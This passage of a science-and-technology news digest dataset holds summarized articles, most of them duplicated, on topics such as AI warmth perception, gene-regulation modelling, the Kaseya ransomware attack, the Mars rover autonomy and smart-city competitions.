A study by researchers at the Technion - Israel Institute of Technology found that potential users of artificial intelligence (AI) systems consider such systems' "warmth" more important than capability and competence. The study of more than 1,600 participants defined warmth as related to traits indicating the AI system's perceived intent, such as friendliness, helpfulness, sincerity, trustworthiness, and morality. The researchers found participants preferred "warm" AI systems built for the consumer that use algorithms trained on less data over systems built for the producer that use state-of-the-art artificial neural network algorithms. The researchers looked at navigation apps, search engines, and recommender systems, in contrast to prior research that focused on virtual agents or robots.
162
Web-Based Design Tool for Better Job Safety
A free Web-based tool developed by Germany's Fraunhofer Institute for Factory Operation and Automation IFF aims to help companies design cobots, or robots that work alongside humans, to reduce the risk of accidents and increase employee safety. The Cobot Designer, which runs on all browsers, can be used by companies before purchasing a robot to determine whether its speed will allow a task to be performed productively and safely. Users enter the robot's parameters, the hazard, and the tool to be used, and the Cobot Designer will calculate the effect of contact between a human and the robot, and the robot's maximum permissible speed. Fraunhofer's Roland Behrens said, "The goal is to use computer simulation, as the Cobot Designer does, to dispense with measurements entirely in the future."
[]
[]
[]
scitechnews
None
None
None
None
A free Web-based tool developed by Germany's Fraunhofer Institute for Factory Operation and Automation IFF aims to help companies design cobots, or robots that work alongside humans, to reduce the risk of accidents and increase employee safety. The Cobot Designer, which runs on all browsers, can be used by companies before purchasing a robot to determine whether its speed will allow a task to be performed productively and safely. Users enter the robot's parameters, the hazard, and the tool to be used, and the Cobot Designer will calculate the effect of contact between a human and the robot, and the robot's maximum permissible speed. Fraunhofer's Roland Behrens said, "The goal is to use computer simulation, as the Cobot Designer does, to dispense with measurements entirely in the future."
163
ML Algorithm Predicts How Genes Are Regulated in Individual Cells
A team of scientists at the University of Illinois Chicago has developed a software tool that can help researchers more efficiently identify the regulators of genes. The system leverages a machine learning algorithm to predict which transcription factors are most likely to be active in individual cells. Transcription factors are proteins that bind to DNA and control what genes are turned "on" or "off" inside a cell. These proteins are relevant to biomedical researchers because understanding and manipulating these signals in the cell can be an effective way to discover new treatments for some illnesses. However, there are hundreds of transcription factors inside human cells and it can take years of research, often through trial and error, to identify which are most active - those that are expressed, or "on" - in different types of cells and which could be leveraged as drug targets. "One of the challenges in the field is that the same genes may be turned "on" in one group of cells but turned "off" in a different group of cells within the same organ," said Jalees Rehman, UIC professor in the department of medicine and the department of pharmacology and regenerative medicine at the College of Medicine. "Being able to understand the activity of transcription factors in individual cells would allow researchers to study activity profiles in all the major cell types of major organs such as the heart, brain or lungs." Named BITFAM, for Bayesian Inference Transcription Factor Activity Model, the UIC-developed system works by combining new gene expression profile data gathered from single cell RNA sequencing with existing biological data on transcription factor target genes. With this information, the system runs numerous computer-based simulations to find the optimal fit and predict the activity of each transcription factor in the cell. The UIC researchers, co-led by Rehman and Yang Dai, UIC associate professor in the department of bioengineering at the College of Medicine and the College of Engineering, tested the system in cells from lung, heart and brain tissue. Information on the model and the results of their tests are reported today in the journal Genome Research . "Our approach not only identifies meaningful transcription factor activities but also provides valuable insights into underlying transcription factor regulatory mechanisms," said Shang Gao, first author of the study and a doctoral student in the department of bioengineering. "For example, if 80% of a specific transcription factor's targets are turned on inside the cell, that tells us that its activity is high. By providing data like this for every transcription factor in the cell, the model can give researchers a good idea of which ones to look at first when exploring new drug targets to work on that type of cell." The researchers say that the new system is publicly available and could be applied widely because users have the flexibility to combine it with additional analysis methods that may be best suited for their studies, such as finding new drug targets. "This new approach could be used to develop key biological hypotheses regarding the regulatory transcription factors in cells related to a broad range of scientific hypotheses and topics. It will allow us to derive insights into the biological functions of cells from many tissues," Dai said. Rehman, whose research focuses on the mechanisms of inflammation in vascular systems, says an application relevant to his lab is to use the new system to focus on the transcription factors that drive diseases in specific cell types. "For example, we would like to understand if there is transcription factor activity that distinguished a healthy immune cell response from an unhealthy one, as in the case of conditions such as COVID-19, heart disease or Alzheimer's disease where there is often an imbalance between healthy and unhealthy immune responses," he said. The studies were supported by grants from the National Institutes of Health (P01HL60678, R01HL154538, R01HL149300, R01HL126516).
A software tool designed by University of Illinois Chicago (UIC) scientists uses a machine learning algorithm to help researchers more efficiently identify genetic regulators. The Bayesian Inference Transcription Factor Activity Model (BITFAM) predicts the transcription factors most likely to be active in individual cells. BITFAM integrates new gene expression profile data collected from single-cell RNA sequencing with current biological data on transcription factor target genes, then runs computer-based models to find the best match and forecast the activity of each transcription factor in the cell. The team tested BITFAM in cells from lung, heart, and brain tissue, and UIC's Shang Gao said the algorithm yields not only significant activities, but also insights into underpinning regulatory mechanisms.
[]
[]
[]
scitechnews
None
None
None
None
A software tool designed by University of Illinois Chicago (UIC) scientists uses a machine learning algorithm to help researchers more efficiently identify genetic regulators. The Bayesian Inference Transcription Factor Activity Model (BITFAM) predicts the transcription factors most likely to be active in individual cells. BITFAM integrates new gene expression profile data collected from single-cell RNA sequencing with current biological data on transcription factor target genes, then runs computer-based models to find the best match and forecast the activity of each transcription factor in the cell. The team tested BITFAM in cells from lung, heart, and brain tissue, and UIC's Shang Gao said the algorithm yields not only significant activities, but also insights into underpinning regulatory mechanisms. A team of scientists at the University of Illinois Chicago has developed a software tool that can help researchers more efficiently identify the regulators of genes. The system leverages a machine learning algorithm to predict which transcription factors are most likely to be active in individual cells. Transcription factors are proteins that bind to DNA and control what genes are turned "on" or "off" inside a cell. These proteins are relevant to biomedical researchers because understanding and manipulating these signals in the cell can be an effective way to discover new treatments for some illnesses. However, there are hundreds of transcription factors inside human cells and it can take years of research, often through trial and error, to identify which are most active - those that are expressed, or "on" - in different types of cells and which could be leveraged as drug targets. "One of the challenges in the field is that the same genes may be turned "on" in one group of cells but turned "off" in a different group of cells within the same organ," said Jalees Rehman, UIC professor in the department of medicine and the department of pharmacology and regenerative medicine at the College of Medicine. "Being able to understand the activity of transcription factors in individual cells would allow researchers to study activity profiles in all the major cell types of major organs such as the heart, brain or lungs." Named BITFAM, for Bayesian Inference Transcription Factor Activity Model, the UIC-developed system works by combining new gene expression profile data gathered from single cell RNA sequencing with existing biological data on transcription factor target genes. With this information, the system runs numerous computer-based simulations to find the optimal fit and predict the activity of each transcription factor in the cell. The UIC researchers, co-led by Rehman and Yang Dai, UIC associate professor in the department of bioengineering at the College of Medicine and the College of Engineering, tested the system in cells from lung, heart and brain tissue. Information on the model and the results of their tests are reported today in the journal Genome Research . "Our approach not only identifies meaningful transcription factor activities but also provides valuable insights into underlying transcription factor regulatory mechanisms," said Shang Gao, first author of the study and a doctoral student in the department of bioengineering. "For example, if 80% of a specific transcription factor's targets are turned on inside the cell, that tells us that its activity is high. By providing data like this for every transcription factor in the cell, the model can give researchers a good idea of which ones to look at first when exploring new drug targets to work on that type of cell." The researchers say that the new system is publicly available and could be applied widely because users have the flexibility to combine it with additional analysis methods that may be best suited for their studies, such as finding new drug targets. "This new approach could be used to develop key biological hypotheses regarding the regulatory transcription factors in cells related to a broad range of scientific hypotheses and topics. It will allow us to derive insights into the biological functions of cells from many tissues," Dai said. Rehman, whose research focuses on the mechanisms of inflammation in vascular systems, says an application relevant to his lab is to use the new system to focus on the transcription factors that drive diseases in specific cell types. "For example, we would like to understand if there is transcription factor activity that distinguished a healthy immune cell response from an unhealthy one, as in the case of conditions such as COVID-19, heart disease or Alzheimer's disease where there is often an imbalance between healthy and unhealthy immune responses," he said. The studies were supported by grants from the National Institutes of Health (P01HL60678, R01HL154538, R01HL149300, R01HL126516).
164
Mass Ransomware Hack Used IT Software Flaws, Researchers Say
Cybersecurity researchers said the Russia-associated REvil hacker gang was responsible for a mass ransomware attack this past weekend that exploited previously unknown flaws in Kaseya's information technology (IT) management software. Marcus Murray at Sweden-based cybersecurity firm TruSec said the victims were targets of opportunity, with REvil pushing ransomware to Internet-linked servers that used flawed VSA software. The Dutch Institute for Vulnerability Disclosure said it had notified Kaseya of multiple software vulnerabilities exploited by the hackers; the Institute said it was working with Kaseya to patch them when the attack was launched. Murray said recovery from the attack could take longer than in typical ransomware incidents, because Kaseya plays a core role in managing security and IT.
[]
[]
[]
scitechnews
None
None
None
None
Cybersecurity researchers said the Russia-associated REvil hacker gang was responsible for a mass ransomware attack this past weekend that exploited previously unknown flaws in Kaseya's information technology (IT) management software. Marcus Murray at Sweden-based cybersecurity firm TruSec said the victims were targets of opportunity, with REvil pushing ransomware to Internet-linked servers that used flawed VSA software. The Dutch Institute for Vulnerability Disclosure said it had notified Kaseya of multiple software vulnerabilities exploited by the hackers; the Institute said it was working with Kaseya to patch them when the attack was launched. Murray said recovery from the attack could take longer than in typical ransomware incidents, because Kaseya plays a core role in managing security and IT.
165
NASA's Self-Driving Perseverance Mars Rover 'Takes the Wheel'
The National Aeronautics and Space Administration (NASA) Jet Propulsion Laboratory (JPL) has developed an auto-navigation system that will allow the Perseverance rover on Mars to drive by itself. The AutoNav system can create three-dimensional maps of terrain ahead and plan a route around any hazards it identifies without additional input from the rover team on Earth. JPL's Vandi Verma said, "We have a capability called 'thinking while driving.' The rover is thinking about the autonomous drive while its wheels are turning." AutoNav and other improvements could boost Perseverance's top speed to 393 feet per hour, compared to 66 feet per hour for its Curiosity predecessor.
[]
[]
[]
scitechnews
None
None
None
None
The National Aeronautics and Space Administration (NASA) Jet Propulsion Laboratory (JPL) has developed an auto-navigation system that will allow the Perseverance rover on Mars to drive by itself. The AutoNav system can create three-dimensional maps of terrain ahead and plan a route around any hazards it identifies without additional input from the rover team on Earth. JPL's Vandi Verma said, "We have a capability called 'thinking while driving.' The rover is thinking about the autonomous drive while its wheels are turning." AutoNav and other improvements could boost Perseverance's top speed to 393 feet per hour, compared to 66 feet per hour for its Curiosity predecessor.
166
Smart Foam Material Gives Robotic Hand the Ability to Self-Repair
SINGAPORE, July 6 (Reuters) - Singapore researchers have developed a smart foam material that allows robots to sense nearby objects, and repairs itself when damaged, just like human skin. Artificially innervated foam, or AiFoam, is a highly elastic polymer created by mixing fluoropolymer with a compound that lowers surface tension. This allows the spongy material to fuse easily into one piece when cut, according to the researchers at the National University of Singapore. "There are many applications for such a material, especially in robotics and prosthetic devices, where robots need to be a lot more intelligent when working around humans," explained lead researcher Benjamin Tee. To replicate the human sense of touch, the researchers infused the material with microscopic metal particles and added tiny electrodes underneath the surface of the foam. When pressure is applied, the metal particles draw closer within the polymer matrix, changing their electrical properties. These changes can be detected by the electrodes connected to a computer, which then tells the robot what to do, Tee said. "When I move my finger near the sensor, you can see the sensor is measuring the changes of my electrical field and responds accordingly to my touch," he said. This feature enables the robotic hand to detect not only the amount but also the direction of applied force, potentially making robots more intelligent and interactive. Tee said AiFoam is the first of its kind to combine both self-healing properties and proximity and pressure sensing. After spending over two years developing it, he and his team hope the material can be put to practical use within five years. "It can also allow prosthetic users to have more intuitive use of their robotic arms when grabbing objects," he said. Our Standards: The Thomson Reuters Trust Principles.
Scientists at the National University of Singapore (NUS) have engineered artificially innervated foam (AiFoam) that enables robots to both sense nearby objects and to repair themselves when damaged. The researchers blended a highly elastic fluoropolymer with a compound that reduces surface tension, allowing the material to fuse easily when cut. Microscopic metal particles and electrodes implanted beneath the foam's surface replicate the human sense of touch; NUS' Benjamin Tee said pressure causes the particles to draw closer within the polymer matrix, altering their electrical properties in a manner detectable by computer-linked electrodes, which then instruct the robot. The robotic hand can detect the amount and the direction of force applied to it, potentially enhancing robot intelligence and interactivity.
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the National University of Singapore (NUS) have engineered artificially innervated foam (AiFoam) that enables robots to both sense nearby objects and to repair themselves when damaged. The researchers blended a highly elastic fluoropolymer with a compound that reduces surface tension, allowing the material to fuse easily when cut. Microscopic metal particles and electrodes implanted beneath the foam's surface replicate the human sense of touch; NUS' Benjamin Tee said pressure causes the particles to draw closer within the polymer matrix, altering their electrical properties in a manner detectable by computer-linked electrodes, which then instruct the robot. The robotic hand can detect the amount and the direction of force applied to it, potentially enhancing robot intelligence and interactivity. SINGAPORE, July 6 (Reuters) - Singapore researchers have developed a smart foam material that allows robots to sense nearby objects, and repairs itself when damaged, just like human skin. Artificially innervated foam, or AiFoam, is a highly elastic polymer created by mixing fluoropolymer with a compound that lowers surface tension. This allows the spongy material to fuse easily into one piece when cut, according to the researchers at the National University of Singapore. "There are many applications for such a material, especially in robotics and prosthetic devices, where robots need to be a lot more intelligent when working around humans," explained lead researcher Benjamin Tee. To replicate the human sense of touch, the researchers infused the material with microscopic metal particles and added tiny electrodes underneath the surface of the foam. When pressure is applied, the metal particles draw closer within the polymer matrix, changing their electrical properties. These changes can be detected by the electrodes connected to a computer, which then tells the robot what to do, Tee said. "When I move my finger near the sensor, you can see the sensor is measuring the changes of my electrical field and responds accordingly to my touch," he said. This feature enables the robotic hand to detect not only the amount but also the direction of applied force, potentially making robots more intelligent and interactive. Tee said AiFoam is the first of its kind to combine both self-healing properties and proximity and pressure sensing. After spending over two years developing it, he and his team hope the material can be put to practical use within five years. "It can also allow prosthetic users to have more intuitive use of their robotic arms when grabbing objects," he said. Our Standards: The Thomson Reuters Trust Principles.
167
Scientists Mine the Rich Seam of Body Wearable Motion Sensors
When positioned strategically, garment seams sewn with conductive yarn can be used to accurately track body motion, according to computer scientists at the University of Bath. Best of all, these charged seams are able to respond to subtle movements that aren't picked up by popular fitness trackers, such as watches and wristbands. In a new study, the Bath researchers found that clothing made with conductive seams can be analysed to identify the wearer's movements. Engineering Doctorate (EngD) student Olivia Ruston , who presented the work at the ACM Designing Interactive Systems conference this month, said: "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance." Groups of scientists have been creating flexible, textile sensors for garments for some time, but the Bath project is the first where researchers have experimented with the location and concentration of conductive seams. They found that where seams are placed on a garment, and the number of seams that are added, are important considerations in the design of a movement-tracking smart garment. Ms Ruston, who is based at the Centre for Digital Entertainment (CDE) - an EPSRC-funded doctoral training centre - said: "There's great potential to exploit the wearing of clothing and tech - a lot of people are experimenting with e-textiles, but we don't have a coherent understanding between technologists and fashion designers, and we need to link these groups up so we can come up with the best ideas for embedding tech into clothing." The yarn used by Ms Ruston and her team comprises a conductive core that is a hybrid metal-polymer resistive material intended for stretch and pressure sensing. Once incorporated into a garment's seam, it is activated at low voltages. The resistance fluctuates as body movement varies the tension across the seams. In the study, the seams were connected to a microcontroller, and then a computer, where the voltage signal was recorded. Professor Mike Fraser , co-author and head of Computer Science, said: "Our work provides implications for sensing-driven clothing design. As opportunities for novel clothing functionality emerge, we believe intelligent seam placement will play a key role in influencing design and manufacturing processes. Ultimately, this could influence what is considered fashionable."
Computer scientists at the University of Bath in the U.K. found that conductive seams in clothing, when accurately positioned, can be used to identify subtle movements by the wearer that are not picked up by fitness watches and wristbands. The researchers found that the number of seams and their placement are important in designing smart garments. They used a yarn with a conductive core made from a hybrid metal-polymer resistive material that stretches, can sense pressure, and may be activated at low voltages when added to a seam. Bath's Olivia Ruston said, "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance."
[]
[]
[]
scitechnews
None
None
None
None
Computer scientists at the University of Bath in the U.K. found that conductive seams in clothing, when accurately positioned, can be used to identify subtle movements by the wearer that are not picked up by fitness watches and wristbands. The researchers found that the number of seams and their placement are important in designing smart garments. They used a yarn with a conductive core made from a hybrid metal-polymer resistive material that stretches, can sense pressure, and may be activated at low voltages when added to a seam. Bath's Olivia Ruston said, "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance." When positioned strategically, garment seams sewn with conductive yarn can be used to accurately track body motion, according to computer scientists at the University of Bath. Best of all, these charged seams are able to respond to subtle movements that aren't picked up by popular fitness trackers, such as watches and wristbands. In a new study, the Bath researchers found that clothing made with conductive seams can be analysed to identify the wearer's movements. Engineering Doctorate (EngD) student Olivia Ruston , who presented the work at the ACM Designing Interactive Systems conference this month, said: "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance." Groups of scientists have been creating flexible, textile sensors for garments for some time, but the Bath project is the first where researchers have experimented with the location and concentration of conductive seams. They found that where seams are placed on a garment, and the number of seams that are added, are important considerations in the design of a movement-tracking smart garment. Ms Ruston, who is based at the Centre for Digital Entertainment (CDE) - an EPSRC-funded doctoral training centre - said: "There's great potential to exploit the wearing of clothing and tech - a lot of people are experimenting with e-textiles, but we don't have a coherent understanding between technologists and fashion designers, and we need to link these groups up so we can come up with the best ideas for embedding tech into clothing." The yarn used by Ms Ruston and her team comprises a conductive core that is a hybrid metal-polymer resistive material intended for stretch and pressure sensing. Once incorporated into a garment's seam, it is activated at low voltages. The resistance fluctuates as body movement varies the tension across the seams. In the study, the seams were connected to a microcontroller, and then a computer, where the voltage signal was recorded. Professor Mike Fraser , co-author and head of Computer Science, said: "Our work provides implications for sensing-driven clothing design. As opportunities for novel clothing functionality emerge, we believe intelligent seam placement will play a key role in influencing design and manufacturing processes. Ultimately, this could influence what is considered fashionable."
168
Global Smart-City Competition Highlights China's Rise in AI
Four years ago, organizers created the international AI City Challenge to spur the development of artificial intelligence for real-world scenarios like counting cars traveling through intersections or spotting accidents on freeways. In the first years, teams representing American companies or universities took top spots in the competition. Last year, Chinese companies won three out of four competitions. Last week, Chinese tech giants Alibaba and Baidu swept the AI City Challenge, beating competitors from nearly 40 nations. Chinese companies or universities took first and second place in all five categories. TikTok creator ByteDance took second place in a competition to identify car accidents or stalled vehicles from freeway videofeeds. The results reflect years of investment by the Chinese government in smart cities. Hundreds of Chinese cities have pilot programs, and by some estimates, China has half of the world's smart cities. The spread of edge computing, cameras, and sensors using 5G wireless connections is expected to accelerate use of smart-city and surveillance technology. The tech displayed in these competitions can be useful to city planners, but it also can facilitate invasive surveillance. Counting the number of cars on the road helps civic engineers understand the resources required to support roads and bridges, but tracking a vehicle across multiple live camera feeds is a powerful form of surveillance. One of the competitions in the AI City Challenge asked participants to identify cars in videofeeds; for the first time this year, the descriptions were in ordinary language, such as "a blue Jeep goes straight down a winding road behind a red pickup truck." The competition comes at a time of increased tech nationalism and tension between the US and China , and growing concern over the powers of AI. The Carnegie Endowment for International Peace in 2019 called China "a major driver of AI surveillance worldwide." The group said China and the US were the two leading exporters of the technology. Last month, the Biden administration expanded a blacklist started by the Trump administration to nearly 60 Chinese companies barred from receiving investment from US financiers. Also in recent weeks, the US Senate passed the Competition and Innovation Act , providing billions in investment for chips, AI, and supply chain reliability. It also calls for investment in smart cities, including expanding a smart-city partnership with southeast Asian nations (excluding China). China's domination of the smart-city challenge may come with an asterisk. John Garofolo, a US government official involved in the competition, says he noticed fewer US teams this year. Organizers say they don't track participants by country. Stan Caldwell is executive director of Mobility21, a project at Carnegie Mellon University assisting smart-city development in Pittsburgh. Caldwell laments that China invests twice as much as the US in research and development as a share of GDP, which he calls key to staying competitive in areas of emerging technology. He says AI researchers in the US can also compete for government grants like the National Science Foundation's Civic Innovation Challenge or the Department of Transportation's Smart City Challenge. A report released last month found that a $50 million DOT grant to the city of Columbus, Ohio, never quite delivered on the promise of building the smart city of the future. "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. But selfishly, we also want this technology to develop here and improve our economy," Caldwell says. Spokespeople for Alibaba and Baidu declined to comment, but advances from smart-city challenges can help fuel commercial offerings for both companies. Alibaba's City Brain tracks more than 1,000 traffic lights in the company's hometown of Hangzhou, a city of 10 million people. A pilot program found that City Brain reduced congestion and helped clear the way for emergency responders.
Chinese tech giants Alibaba and Baidu took first and second place in all five categories in the recent AI City Challenge, outperforming competitors from almost 40 countries. Carnegie Mellon University's Stan Caldwell points out that China invests twice as much as the U.S. in research and development as a share of gross domestic product. Caldwell said, "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. But selfishly, we also want this technology to develop here and improve our economy." The U.S. National Institute for Standards and Technology is calling on American artificial intelligence (AI) researchers to participate in its Automated Streams Analysis for Public Safety (ASAPS) Challenge Program, which aims to develop AI to help emergency operators predict when their services will be needed.
[]
[]
[]
scitechnews
None
None
None
None
Chinese tech giants Alibaba and Baidu took first and second place in all five categories in the recent AI City Challenge, outperforming competitors from almost 40 countries. Carnegie Mellon University's Stan Caldwell points out that China invests twice as much as the U.S. in research and development as a share of gross domestic product. Caldwell said, "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. But selfishly, we also want this technology to develop here and improve our economy." The U.S. National Institute for Standards and Technology is calling on American artificial intelligence (AI) researchers to participate in its Automated Streams Analysis for Public Safety (ASAPS) Challenge Program, which aims to develop AI to help emergency operators predict when their services will be needed. Four years ago, organizers created the international AI City Challenge to spur the development of artificial intelligence for real-world scenarios like counting cars traveling through intersections or spotting accidents on freeways. In the first years, teams representing American companies or universities took top spots in the competition. Last year, Chinese companies won three out of four competitions. Last week, Chinese tech giants Alibaba and Baidu swept the AI City Challenge, beating competitors from nearly 40 nations. Chinese companies or universities took first and second place in all five categories. TikTok creator ByteDance took second place in a competition to identify car accidents or stalled vehicles from freeway videofeeds. The results reflect years of investment by the Chinese government in smart cities. Hundreds of Chinese cities have pilot programs, and by some estimates, China has half of the world's smart cities. The spread of edge computing, cameras, and sensors using 5G wireless connections is expected to accelerate use of smart-city and surveillance technology. The tech displayed in these competitions can be useful to city planners, but it also can facilitate invasive surveillance. Counting the number of cars on the road helps civic engineers understand the resources required to support roads and bridges, but tracking a vehicle across multiple live camera feeds is a powerful form of surveillance. One of the competitions in the AI City Challenge asked participants to identify cars in videofeeds; for the first time this year, the descriptions were in ordinary language, such as "a blue Jeep goes straight down a winding road behind a red pickup truck." The competition comes at a time of increased tech nationalism and tension between the US and China , and growing concern over the powers of AI. The Carnegie Endowment for International Peace in 2019 called China "a major driver of AI surveillance worldwide." The group said China and the US were the two leading exporters of the technology. Last month, the Biden administration expanded a blacklist started by the Trump administration to nearly 60 Chinese companies barred from receiving investment from US financiers. Also in recent weeks, the US Senate passed the Competition and Innovation Act , providing billions in investment for chips, AI, and supply chain reliability. It also calls for investment in smart cities, including expanding a smart-city partnership with southeast Asian nations (excluding China). China's domination of the smart-city challenge may come with an asterisk. John Garofolo, a US government official involved in the competition, says he noticed fewer US teams this year. Organizers say they don't track participants by country. Stan Caldwell is executive director of Mobility21, a project at Carnegie Mellon University assisting smart-city development in Pittsburgh. Caldwell laments that China invests twice as much as the US in research and development as a share of GDP, which he calls key to staying competitive in areas of emerging technology. He says AI researchers in the US can also compete for government grants like the National Science Foundation's Civic Innovation Challenge or the Department of Transportation's Smart City Challenge. A report released last month found that a $50 million DOT grant to the city of Columbus, Ohio, never quite delivered on the promise of building the smart city of the future. "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. But selfishly, we also want this technology to develop here and improve our economy," Caldwell says. Spokespeople for Alibaba and Baidu declined to comment, but advances from smart-city challenges can help fuel commercial offerings for both companies. Alibaba's City Brain tracks more than 1,000 traffic lights in the company's hometown of Hangzhou, a city of 10 million people. A pilot program found that City Brain reduced congestion and helped clear the way for emergency responders.
169
Tech Spending Expected to Rise as Pandemic Restrictions Ease, Economy Improves
CIOs at U.S. companies across several industries are expected to spend more on software in 2021, with an emphasis on software related to process automation, artificial intelligence and security. Market researcher Forrester Research Inc. last week raised its forecast for enterprise technology spending for this year, citing stimulus funding and stronger-than-expected economic data. As pandemic restrictions ease, information technology budgets at U.S. businesses and governments are now projected to rise to nearly $2 trillion this year, up 7.4% from 2020, according to the Forrester report. In December, Forrester projected IT spending would fall 0.4% this year, compared with increases of 6.7% in 2019 and 1.8% in 2020. Then in April, Forrester forecast budgets would grow 6% year-over-year in 2021. The upward revisions reflect the impact of an economic stimulus package President Biden signed into law in March, said Andrew Bartels, a research analyst at Forrester. Of all spending, communications equipment is the fastest-growing spending category, forecast to rise 13.2% this year. Spending in the category fell last year as people moved to remote work, but it is expected to pick up again as offices reopen, Mr. Bartels said. Forrester in April forecast communications equipment spending would increase 12.4% this year. "Activities are coming back again," Mr. Bartels said. "And as they do so, [businesses] become buyers of technologies to support the reopening." Cambia Health Solutions Inc. plans a double-digit increase in spending on artificial intelligence and consumer-facing applications this year even as its overall IT budget remains flat. The Portland, Ore.-based healthcare company is transitioning to a post-pandemic hybrid work environment, according to Laurent Rotival, its CIO. "We are increasing our focus and spend on the accelerated evolution of our network and infrastructure to serve employees, partners, customers, and health plan members anywhere," Mr. Rotival said. Edward Wagoner, digital CIO of Jones Lang LaSalle Inc. , said more data tools and capabilities are a top priority for some of the commercial real estate services company's customers. Adopting a hybrid approach to work is an important factor in retaining top talent, Mr. Wagoner added, and companies need to be equipped to collect and analyze those preferences. Software spending, the second-fastest growing segment of IT spending, is forecast to rise 10.4% this year, compared with an April forecast of 9.7% growth. Mr. Bartels said many companies are greenlighting new software spending after taking a cautious approach in 2020. Within software, spending on platforms for process automation and AI are projected to grow 33% and 13%, respectively, this year. Security software spending is projected to grow 11%. Spending on software will reach $482 billion in 2022, according to Forrester, marking the first time it will surpass CIO staff spending, which is forecast at $470 billion next year. Write to Jared Council at [email protected]
Market researcher Forrester Research has revised its 2021 forecast of U.S. enterprise information technology (IT) spending growth from 6% to 7.4% over 2020 levels, the result of increased stimulus funding, the easing of pandemic restrictions, and stronger than anticipated economic data. Forrester's Andrew Bartels said communications gear is the fastest-growing spending area, projected to increase 13.2% as offices reopen. Spending on software, the second-fastest-growing IT category, is expected to rise 10.4% this year, up from an April forecast of 9.7%. Process automation and AI software spending should increase 33% and 13%, respectively, while security software investing is expected to climb 11%. Said Bartels, "Activities are coming back again, and as they do so, [businesses] become buyers of technologies to support the reopening."
[]
[]
[]
scitechnews
None
None
None
None
Market researcher Forrester Research has revised its 2021 forecast of U.S. enterprise information technology (IT) spending growth from 6% to 7.4% over 2020 levels, the result of increased stimulus funding, the easing of pandemic restrictions, and stronger than anticipated economic data. Forrester's Andrew Bartels said communications gear is the fastest-growing spending area, projected to increase 13.2% as offices reopen. Spending on software, the second-fastest-growing IT category, is expected to rise 10.4% this year, up from an April forecast of 9.7%. Process automation and AI software spending should increase 33% and 13%, respectively, while security software investing is expected to climb 11%. Said Bartels, "Activities are coming back again, and as they do so, [businesses] become buyers of technologies to support the reopening." CIOs at U.S. companies across several industries are expected to spend more on software in 2021, with an emphasis on software related to process automation, artificial intelligence and security. Market researcher Forrester Research Inc. last week raised its forecast for enterprise technology spending for this year, citing stimulus funding and stronger-than-expected economic data. As pandemic restrictions ease, information technology budgets at U.S. businesses and governments are now projected to rise to nearly $2 trillion this year, up 7.4% from 2020, according to the Forrester report. In December, Forrester projected IT spending would fall 0.4% this year, compared with increases of 6.7% in 2019 and 1.8% in 2020. Then in April, Forrester forecast budgets would grow 6% year-over-year in 2021. The upward revisions reflect the impact of an economic stimulus package President Biden signed into law in March, said Andrew Bartels, a research analyst at Forrester. Of all spending, communications equipment is the fastest-growing spending category, forecast to rise 13.2% this year. Spending in the category fell last year as people moved to remote work, but it is expected to pick up again as offices reopen, Mr. Bartels said. Forrester in April forecast communications equipment spending would increase 12.4% this year. "Activities are coming back again," Mr. Bartels said. "And as they do so, [businesses] become buyers of technologies to support the reopening." Cambia Health Solutions Inc. plans a double-digit increase in spending on artificial intelligence and consumer-facing applications this year even as its overall IT budget remains flat. The Portland, Ore.-based healthcare company is transitioning to a post-pandemic hybrid work environment, according to Laurent Rotival, its CIO. "We are increasing our focus and spend on the accelerated evolution of our network and infrastructure to serve employees, partners, customers, and health plan members anywhere," Mr. Rotival said. Edward Wagoner, digital CIO of Jones Lang LaSalle Inc. , said more data tools and capabilities are a top priority for some of the commercial real estate services company's customers. Adopting a hybrid approach to work is an important factor in retaining top talent, Mr. Wagoner added, and companies need to be equipped to collect and analyze those preferences. Software spending, the second-fastest growing segment of IT spending, is forecast to rise 10.4% this year, compared with an April forecast of 9.7% growth. Mr. Bartels said many companies are greenlighting new software spending after taking a cautious approach in 2020. Within software, spending on platforms for process automation and AI are projected to grow 33% and 13%, respectively, this year. Security software spending is projected to grow 11%. Spending on software will reach $482 billion in 2022, according to Forrester, marking the first time it will surpass CIO staff spending, which is forecast at $470 billion next year. Write to Jared Council at [email protected]
170
EU Citizens' Data Will Continue Flowing into the U.K.
The European Commission (EC) has adopted adequacy decisions that designate U.K. data protection laws equivalent to European Union (EU) statutes, which will permit EU-U.K. data flows to continue following Brexit. The decision means Europeans' personal data will receive the same level of protection in Britain as it would inside the bloc. The EU for the first time has included a sunset clause, meaning the decisions will end four years after they are enacted. U.K. secretary of state for digital Oliver Dowden said the EU's formal recognition of the U.K.'s data protection standards "will be welcome news to businesses, support continued cooperation between the U.K. and the EU, and help law enforcement authorities keep people safe."
[]
[]
[]
scitechnews
None
None
None
None
The European Commission (EC) has adopted adequacy decisions that designate U.K. data protection laws equivalent to European Union (EU) statutes, which will permit EU-U.K. data flows to continue following Brexit. The decision means Europeans' personal data will receive the same level of protection in Britain as it would inside the bloc. The EU for the first time has included a sunset clause, meaning the decisions will end four years after they are enacted. U.K. secretary of state for digital Oliver Dowden said the EU's formal recognition of the U.K.'s data protection standards "will be welcome news to businesses, support continued cooperation between the U.K. and the EU, and help law enforcement authorities keep people safe."
171
NASA Makes More Than 800 Innovations Available to Public
